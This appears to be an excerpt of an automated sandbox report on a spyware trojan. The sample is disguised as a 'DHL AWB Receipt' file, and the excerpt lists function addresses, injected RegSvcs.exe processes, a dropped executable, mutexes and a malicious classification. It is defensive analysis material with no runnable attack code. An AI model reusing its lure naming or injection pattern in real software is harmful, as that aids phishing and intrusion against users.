                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01733D70 NtOpenThread,8_2_01733D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01733D10 NtOpenProcessToken,8_2_01733D10
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_0608618C0_2_0608618C
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_060873A80_2_060873A8
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_060E95900_2_060E9590
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_060E91580_2_060E9158
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_060EB1E00_2_060EB1E0
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_060E8D200_2_060E8D20
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_060EA8300_2_060EA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004188238_2_00418823
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041009A8_2_0041009A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004100A38_2_004100A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416A1E8_2_00416A1E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416A238_2_00416A23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004102C38_2_004102C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E2998_2_0040E299
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E2A38_2_0040E2A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E3F28_2_0040E3F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E3F38_2_0040E3F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401B838_2_00401B83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401B908_2_00401B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E43C8_2_0040E43C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042ED438_2_0042ED43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E6068_2_0040E606
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004026E08_2_004026E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402FD58_2_00402FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402FE08_2_00402FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017881588_2_01788158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179A1188_2_0179A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F01008_2_016F0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B81CC8_2_017B81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C01AA8_2_017C01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B41A28_2_017B41A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017920008_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BA3528_2_017BA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E3F08_2_0170E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C03E68_2_017C03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A02748_2_017A0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017802C08_2_017802C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017005358_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C05918_2_017C0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B24468_2_017B2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A44208_2_017A4420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AE4F68_2_017AE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017007708_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017247508_2_01724750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FC7C08_2_016FC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171C6E08_2_0171C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017169628_2_01716962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017029A08_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017CA9A68_2_017CA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170A8408_2_0170A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017028408_2_01702840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E8F08_2_0172E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E68B88_2_016E68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BAB408_2_017BAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B6BD78_2_017B6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FEA808_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179CD1F8_2_0179CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170AD008_2_0170AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FADE08_2_016FADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01718DBF8_2_01718DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700C008_2_01700C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0CF28_2_016F0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A0CB58_2_017A0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01774F408_2_01774F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01720F308_2_01720F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A2F308_2_017A2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01742F288_2_01742F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F2FC88_2_016F2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177EFA08_2_0177EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700E598_2_01700E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BEE268_2_017BEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BEEDB8_2_017BEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01712E908_2_01712E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BCE938_2_017BCE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017CB16B8_2_017CB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EF1728_2_016EF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173516C8_2_0173516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170B1B08_2_0170B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B70E98_2_017B70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BF0E08_2_017BF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017070C08_2_017070C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AF0CC8_2_017AF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016ED34C8_2_016ED34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B132D8_2_017B132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0174739A8_2_0174739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171D2F08_2_0171D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A12ED8_2_017A12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171B2C08_2_0171B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017052A08_2_017052A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B75718_2_017B7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179D5B08_2_0179D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F14608_2_016F1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BF43F8_2_017BF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BF7B08_2_017BF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B16CC8_2_017B16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017099508_2_01709950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171B9508_2_0171B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017959108_2_01795910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176D8008_2_0176D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017038E08_2_017038E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BFB768_2_017BFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01775BF08_2_01775BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173DBF98_2_0173DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171FB808_2_0171FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01773A6C8_2_01773A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BFA498_2_017BFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B7A468_2_017B7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017ADAC68_2_017ADAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01745AA08_2_01745AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179DAAC8_2_0179DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A1AA38_2_017A1AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B7D738_2_017B7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B1D5A8_2_017B1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01703D408_2_01703D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171FDC08_2_0171FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01779C328_2_01779C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BFCF28_2_017BFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BFF098_2_017BFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BFFB18_2_017BFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01701F928_2_01701F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01709EB08_2_01709EB0
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06EC618C9_2_06EC618C
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06EC73A89_2_06EC73A8
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06EC73B49_2_06EC73B4
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06EC73B19_2_06EC73B1
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06FADE0E9_2_06FADE0E
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06FA95909_2_06FA9590
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06FAB1E09_2_06FAB1E0
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06FA91589_2_06FA9158
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06FA8D209_2_06FA8D20
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_06FAA8309_2_06FAA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018F010017_2_018F0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0194600017_2_01946000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019802C017_2_019802C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190053517_2_01900535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018FC7C017_2_018FC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0192475017_2_01924750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190077017_2_01900770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0191C6E017_2_0191C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019029A017_2_019029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0191696217_2_01916962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0193889017_2_01938890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018E68B817_2_018E68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0192E8F017_2_0192E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190A84017_2_0190A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190284017_2_01902840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018FEA8017_2_018FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01918DBF17_2_01918DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01908DC017_2_01908DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018FADE017_2_018FADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190AD0017_2_0190AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190ED7A17_2_0190ED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018F0CF217_2_018F0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01900C0017_2_01900C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0197EFA017_2_0197EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018F2FC817_2_018F2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01920F3017_2_01920F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01942F2817_2_01942F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01974F4017_2_01974F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01912E9017_2_01912E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01900E5917_2_01900E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190B1B017_2_0190B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018EF17217_2_018EF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0193516C17_2_0193516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019033F317_2_019033F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018ED34C17_2_018ED34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019052A017_2_019052A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0191B2C017_2_0191B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0191D2F017_2_0191D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190349717_2_01903497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019474E017_2_019474E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018F146017_2_018F1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190B73017_2_0190B730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190599017_2_01905990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0190995017_2_01909950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0191B95017_2_0191B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019038E017_2_019038E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0196D80017_2_0196D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0191FB8017_2_0191FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01975BF017_2_01975BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0193DBF917_2_0193DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01973A6C17_2_01973A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0191FDC017_2_0191FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01903D4017_2_01903D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01979C3217_2_01979C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01919C2017_2_01919C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01901F9217_2_01901F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01909EB017_2_01909EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0042ED4317_2_0042ED43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01735130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0196EA12 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0176EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01947E54 appears 96 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0177F290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01747E54 appears 99 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 016EB970 appears 262 times
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: invalid certificate
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1841864099.0000000003DB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000000.1749282533.0000000000A42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJifX.exe: vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1833996170.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1851655343.0000000005650000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1854846621.0000000007840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exeBinary or memory string: OriginalFilenameJifX.exe: vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: AYBPplggzXaXav.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, OIIb5mbrs7CURfU9gB.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, OIIb5mbrs7CURfU9gB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, OIIb5mbrs7CURfU9gB.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, OIIb5mbrs7CURfU9gB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@16/10
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMutant created: \Sessions\1\BaseNamedObjects\XUThKrnbANz
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
